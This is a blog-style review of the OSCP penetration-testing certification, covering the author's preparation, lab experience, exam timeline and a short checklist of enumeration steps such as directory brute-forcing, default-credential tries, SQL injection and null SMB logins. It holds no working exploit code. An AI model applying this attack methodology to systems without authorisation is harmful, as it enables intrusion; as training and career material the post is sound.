OSCP – Offensive security certified
professional – Penetration testing with Kali Linux is a certification offered
by offensive security. This is considered one of the most challenging
certifications in the field of cyber security. This is for the people who are
aiming to grow in the domain of Penetration testing. In this review, I am going
to share my OSCP experience and the way I prepared for the exam, my prior
knowledge and I will share the cheat sheets that I used for exam. So, that you can
have a brief idea of what is necessary before digging into OSCP.
For my OSCP Review - Well, for starters – I
have a little bit background in security domain, I am a Postgraduate in cyber
security and have been interested in hacking from many years, but I am noob who
haven’t exactly worked on exploitation stuff.
Before getting into how oscp exam and stuff – I’ll share some info on
OSCP lab and Pre-requesters. I have been
planning take OSCP from Mar 2019 and felt like I need to learn a lot before going
into OSCP. So, in august I bought hackthebox VIP and started cracking boxes.
All the resources over the internet stated that HTB is very useful for OSCP,
even I felt like HackTheBox is very useful for OSCP. Later I researched a lot about
OSCP Certification, and everyone says its freaking hard and by reading all
those reviews I got very excited and Scheduled my Lab to start from Dec 22nd.
Who should take OSCP?
If you ask me that question, I would say
whoever is interested in technology or working in security domain. It helps you
a lot in terms of knowledge and understanding of low-level objects pertaining
to security and hacking. It helps you to adapt hacker’s mindset and you will
learn the way hackers hack into an enterprise environment. If you are working in a red team, this is a
certification you need to start with. If you are tech-savy its gonna be very
easy and interesting. Also, the best
thing about OSCP is once you are an OSCP, you are always an OSCP – there
is no expiration date for OSCP certification.
100% yes, as the threat landscape is
enlarging, all security analyst and experts should have the basic understanding
of how hackers think and start their attack process. If you are a beginner, its
gonna be super fun to learn new technologies and attacking techniques. Even if
you are not a red team guy, there is no harm in learning red team techniques as
you can use them in securing your company.
Is OSCP Difficult?
Well, it’s not for me to decide, its based on
your prior experience and based your definition of difficulty. I personally
didn’t feel it too hard maybe because I prepared well before taking oscp lab.
If you are a complete beginner take your time to learn some basics and complete
my prerequisites stated below – you are good to go and take 6o days or 90 days
lab. So, that you can sit tight and learn everything peacefully at your own
pace. There is nothing too hard in this world until you try and succeed.
OSCP Pricing:
As I worked on Hackthebox a lot (I cracked
around 65 boxes in OSCP), I opted the lab for 30 Days – which costed 800$, now
the pricing has changed, and it is 1000$ for 30 Days and one free exam attempt.
It’s up to you to choose the number of days there is an increase of 200$ for
every 30 days.
Prerequisites for Enrolling to OSCP:
·
Should
Never Give up
·
Basic
Understanding of Networking
·
Knowledge
of Bash Scripting would be very helpful to automate petty tasks
·
Basic
understanding of Assembly Language & Buffer Overflow attacks
·
Knowledge
on Web Penetration testing like XXS, SQL injections
·
Using Reverse
Shells – very important
·
Windows
& Linux Commands – Very important
My Personal List of OSCP Like boxes from
HackTheBox – Lame, Shocker, Nibbles, Solidstate, Valentine, Poison, Irked,
October, SecNotes, Bounty, Arctic, Bastion, red cross, Active, Bart, Jeeves
How to Prepare for OSCP before Buying the Lab:
If you have no prior knowledge on penetration testing,
I would suggest you to start solving capture the flag events, the more you do,
the much better it is, this way you will get accustomed with new technologies,
applications, tools – there are lot more advantages of CTFs than you can
imagine. I personally started with Overthewire – Bandit, Natas and it continues… then go after Hackthebox Challenges, Rootme, pawanable.kr
The final and most important thing to learn is
Buffer overflow, to understand win 32 & linux 32-bit buffer overflows
better – try to understand the Basics
of Assembly,
understand the basics will help you a lot in exploitation development phase.
Learn Exploiting
Slmail 5.5 manually properly.
When you buy OSCP lab, you get a video
material of 16 hours + 853 Pages Pdf which covers all OSCP topics. You can find
all OSCP
Topics Here
The mail objective of cracking the machines is
to capture proof.txt files from the machines, they are located in root
directory of the machine and only an Administrator or a Root user of the
machine can view proof.txt. if you got proof.txt of a machine – that means you
cracked that machine.
I started my lab on Dec 22nd,
hoping to crack a lot of machines on first day, I was able to crack my first
box in an hour and I got lost in the domain. The first step of hacking is
Reconnaissance – which I missed, I just randomly selected the first machine and
try exploiting it and luckily it was a success. Now, I didn’t know what to do –
So, I remembered Cyber
Kill Chain Framework which I
learned in my college days and started with Reconnaissance and slowly grasped
the techniques as it’s my first time seeing hell lot of vulnerable machines in
a same domain right in-front of me. I have gone through all the videos and pdf
they provided in first few days cracking boxes simultaneously. So, first make
sure you read all the PDF document and go through the videos. Don’t waste too much
time reading the docs, just work on lab simultaneously.
OSCP Lab Environment consists of 4 Departments.
Only first department is accessible at first – the more you crack; the more
departments are accessible to you. Keys to these depts are hidden in few boxes.
Unlocking these departments will grant you access to new machines, new
challenges, new hacks.
My goal was to crack all the machines in 30
days, but I have my office (9 hours). So, I decreased my sleep time to 6 hours
– I felt that is more than enough. So, I must work for 6 hours on my lab, which
I did. I worked on the lab for almost 25 days, rest 5 days I didn’t get a
change to touch my lab because of my office work. I Cracked 46 Machines in 28
Days and I still have 2 days left – there are lab pdf challenges, if we are to
solve all of them, document each and every challenge and send it along without
exam report – Offensive Security will award us 5 Bonus points – these 5 points
will be a life saver if you get 65 points in the exam and if you submit your
lab report – you pass. As I have 2 days left and I am not in the mood to crack
machines, I started working on the Pdf challenges – I would have missed a lot,
if I didn’t work on the pdf challenges then– there is a lot of learn from the
Pdf they provided – I covered all the challenges in the last 2 days – took me
around 20-25 hours easily to solve and document all those challenges. Do not
work on the Pdf challenges at the end, please start it from the Day 1 as you
can learn a lot from the doc and videos Offensive Security provided, In fact
all the items provided in the docs and pdf are used in OSCP lab.
If you are not working in a red team or if you
don’t have prior experience in penetration testing, I personally recommend you take
either 60 or 90 days and explore more in the network. There is always more to
enumerate. If you are struck anywhere you can contact OSCP support staff, they
are more of a try harder gang- they will try to guide you without giving you
the answer.
·
Read and complete all challenges given in PDF –
its very helpful
·
Make notes of all the machines you crack
·
Make your own cheatsheet
· Automate petty tasks – learn to use bash and powershell
· Practice Reporting of cracked machines
What you can learn in OSCP
·
Various
Windows & Linux command like tools
·
Bash
& PowerShell Scripting
·
Reverse
Shells/ Bind Shells
·
Passive
and Active Reconnaissance, Port Scanning, Basic Enumeration
·
Vulnerability
Scanning and Assessments
·
Exploiting
Web Based vulnerabilities
·
Binary
Exploitation - Windows & Linux Buffer over flow (My Fav)
·
Client-Side
Attacks
·
Exploiting
known vulnerabilities using publicly available exploits
·
File
Transfers
·
Anti-virus
Evasion
·
Windows
& Linux Privilege Escalation
·
Password
Attacks
·
Port
Redirection and Tunnelling (pivoting)
· Active Directory Attacks (New)
·
Metasploit
& PowerShell Empire
OSCP Exam: My Story
As every one of you know OSCP Exam consists of
5 boxes – the boxes are categorized as 2*20 points machines, 2*25 points
machines – one of which is buffer over flow, 1*10 points box – which sums to a
total of 100 points and you need 70 Points to pass.
So, what’s the best bet here? My plan is to go for 25 points buffer over
flow machine first, then 10 points (as this is the easiest machine in exam and
trickiest as well), then go after both 20 points machine and then 25 points
machine.
I planned on taking the exam as soon as possible from the date of my lab expiration which is Jan 21st. So, I logged into exam portal and got shocked I have no room to book until 20 days. Crazy right, OffSec calendar is fully booked and I am more of a night guy and was looking to start the exam in the eve and booked it for 14:30 PM Feb 18th.
Moment of Truth Arrived, the day of exam – as
usual I woke up late (11.30 AM), got ready for exam and I started 30 mins early
for document verification and stuff. It took around 30 mins and my exam was
supposed to start at 2.30PM and I am waiting for the OffSec team to send me
vpn. I waited and waited its past 3:00PM, then I texted proctor that I haven’t
received the VPN for exam. Proctor asked me to contact support and when I
contacted support, I receive the vpn in 5-10 mins. Its almost 3:10 PM I guess.
I lost 30 mins of my exam, I kind of tensed for a min, I calmed down in
sometime and read through all the info presented
Timeline:
3.30 PM - started my port scanning on all
the machines
It’s never good to rush. I took
everything step by step as planned. Started with buffer overflow, I faced some
challenges
5:00 PM - cracked by first
machine and carefully submitted the proof.txt. I took a deep breath and started
reading my port scan report and started 10 Points box, it was very tricky as
expected
6:19 PM – Cracked the 10 Points box,
faster than expected. Now, my actual plan is to go after 20 points boxes but
when I am going through the other 25 points nmap scan report, I felt like I
could crack It and started it –
7:20 PM - Got the initial shell on other
25 points box, I was jumping in joy as I got 25+10+12.5=45.5 points, my feeling
is like all i need is to crack only one 20 points box to pass as I have the
report ready (5 Bonus points). Now, as I tampered my exam plan, I wanted to
back to my original plan of going after 20 points first before going after the
2nd 25 points box. So, I stopped the 25 points box after
getting initial shell and started working on the first 20 points box and at
08:43 PM - Got initial shell on first 20
Points box
9:00 PM – Rooted the 20 Points box and
submitted the flag. I got up, walked for few mins, ate something
9:15 PM - Started 2nd 20
points box
22.30PM - Got the initial flag Now I am
confident that I passed the exam (25+12.5+10+20+10) I took dinner break here
for around 30-45 mins and got
11:10 PM - Back to game
11:43 PM – Rooted the 2nd 20
points box. The end of game, I got 87.5 Points + 5 bonus points (Assumed) – I
didn’t want to strain myself more, took a break long break and chilled. I still
have 13 hours left for exam + 24 hours for report writing. 70% if the time I
played music to calm me down.
1:00 AM – Report Writing; As screen recording
is not allowed, I started writing my report
3:00 AM - I slept for 5-6 hours
9:00 AM - I started working on privilege
escalation to 25 points box, It was an unsuccessful attempt though, I was
unable to crack it.
12:00 PM – Lost Connection to offsec VPN
for an hour. So, I sent an email to OffSec team and they extended my lab for 1
and half hour. That was great, I got more time to work on my report writing
4:00 PM - Lab Ended.
5:00 AM (Following day) – I’ve submitted my
report next day and slept peacefully.
28th Feb 2:00 AM - I got an email from OffSec
saying I passed the exam and Officially I am OSCP Now. That was a very great
journey, I enjoyed every movement of exam more than lab. Thank you OffSec for
such a great experience. & my family who supported and helped me in every
way possible to achieve this.
1. Check the Machine IP's
a. Start Timer (Dont Stay on a Single Machine for
too Long)
b. Cracked a Machine - Restart the Timer
2. Start Buffer overflow
a. Start NmapAutomator on all 4
machines before starting BOF
3. Take Screenshots of everything
4. Start
with 10 Points Box after BOF (25 Points); If this is taking too long, switch to
a new box. Come back to this later. Document Everything.
5. HTTP is Vulnerable Most of the times - start
with HTTP
ü
Start
nikto, dirb,dirsearch, dirbuster - extensions
ü
robots.txt,
config.php, license.txt
ü
Try
Default Creds - if the creds doesnt work - try searching for creds for sometime
and move to next step as it might be a rabbit hole
ü
Try Cewl
--> use it for brute forcing
ü
Check for
the running application version
ü
Google
the application for finding version & exploits
ü
Dont just
rely on Searchsploit, search on google as well.
ü
Check
Github Exploits as well, read the exploit properly
ü
Run
wpscan, droopscan if they are found - search for vuln plugins, version
ü
Search
for LFI / RFI - got a doubt - Check PDF/ Videos
ü
Check for
SQL Injections
ü
Check for
Tomcat, web.config, cgi-bin exploits
6. Checks all ports - do a full nmap scan, if u
think something is missing
7. Don’t work on a single port for too long.
8. REMEMBER, sometimes – you cannot fully exploit
a box with just one vulnerability, you might need to some other vuln to exploit
the box.
9. Always check for nmap vulns
10. Ippsec.rocks - Search for vulnerability here
11.Check SMB port
a. If linux machine has smb - check version and
exploit it
b. use smbclient without password and null login as well
Resources:
Pre-Requesters
3) Ippsec.rocks
à you
wanna learn exploit something, search here
Pivoting:
Windows Privilege Escalation:
Linux Privilege Escalation:
Exploits:
Buffer Overflow:
Active Directory Penetration Testing
Others
Finally, OSCP is something that all
penetration testers and aspiring pentation testers must do, I am really glad I
took OSCP exam, it was so much fun and exciting. I enjoyed every movement of
lab and exam. If you are new to red team or penetration testing, there is hell
of things to learn here – but do not take it as an exam or for certification –
OSCP is a journey towards trying harder and never giving up on anything. The
more you try, the more enjoy and learn. If you give up halfway – you will lose
a lot. OSCP doesn’t not cover high level topics, but there is a lot of learn
from basics as well. OSCP can act as a turn around to the way you see security.
I thank my Family, Offensive Security Team,
Hackthebox & Ippsec – a learnt a lot from you all and will keep learning 😊